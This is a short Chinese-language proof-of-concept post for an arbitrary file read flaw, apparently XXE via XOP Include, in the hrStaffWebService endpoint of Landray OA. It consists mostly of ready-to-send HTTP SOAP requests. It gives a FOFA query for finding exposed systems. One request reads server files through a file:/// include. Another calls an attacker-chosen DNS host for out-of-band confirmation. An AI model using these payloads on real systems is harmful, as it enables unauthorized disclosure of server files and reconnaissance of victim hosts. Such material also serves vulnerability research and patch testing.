蓝凌OA /sys/webservice/hrStaffWebService接口处存在任意文件读取漏洞
FOFA
app="Landray-OA系统"
POC
- 文件读取
POST /sys/webservice/hrStaffWebService HTTP/1.1
Host:
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 619
Connection: close
------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"
<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
<web:getHrStaffElements>
<arg0>
<beginTimeStamp>1</beginTimeStamp>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count>
</arg0>
</web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--
- DNS带外
因为这个漏洞第一眼就觉得是XXE漏洞,然后就测试了下XXE的DNS带外的方式。
POST /sys/webservice/hrStaffWebService HTTP/1.1
Host:
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 598
Connection: close
SOAPAction: ""
------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body>
<web:getHrStaffElements>
<arg0>
<beginTimeStamp>1</beginTimeStamp>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns网址"></xop:Include></count>
</arg0>
</web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--